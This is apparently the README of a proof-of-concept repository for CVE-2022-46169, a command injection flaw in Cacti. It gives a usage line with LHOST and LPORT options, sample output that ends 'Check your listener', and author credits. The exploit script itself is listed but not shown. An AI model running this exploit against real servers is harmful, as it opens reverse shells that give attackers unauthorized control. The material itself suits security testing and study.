Find out a modified Cacti public exploit!# CVE-2022-46169
This exploit is a modified version from the original script by @FredBrave and adapted by @arthurcortesr and @alv-david.
## Usage/Examples
```python
python3 CVE-2022-46169.py -u http://XX.XX.XX.XX --LHOST XX.XX.XX.XX --LPORT XXXX --host-id X --local-id X
```
## Expected results
```
[*] Testing host_id=X, local_data_id=XX...
[+] Found working combination: host_id=X, local_data_id=X
[*] Payload sent successfully! Check your listener.
```
## Authors
- [@FredBrave](https://github.com/FredBrave)
- [@arthurcortesr](https://www.linkedin.com/in/arthurcortesr/)
- [@alv-david](https://www.linkedin.com/in/alv-david/)
[4.0K] /data/pocs/eb4f04a81e6ef4a14690194469e1bfe5cbda3148
├── [3.5K] CVE-2022-46169.py
└── [ 635] README.md
0 directories, 2 files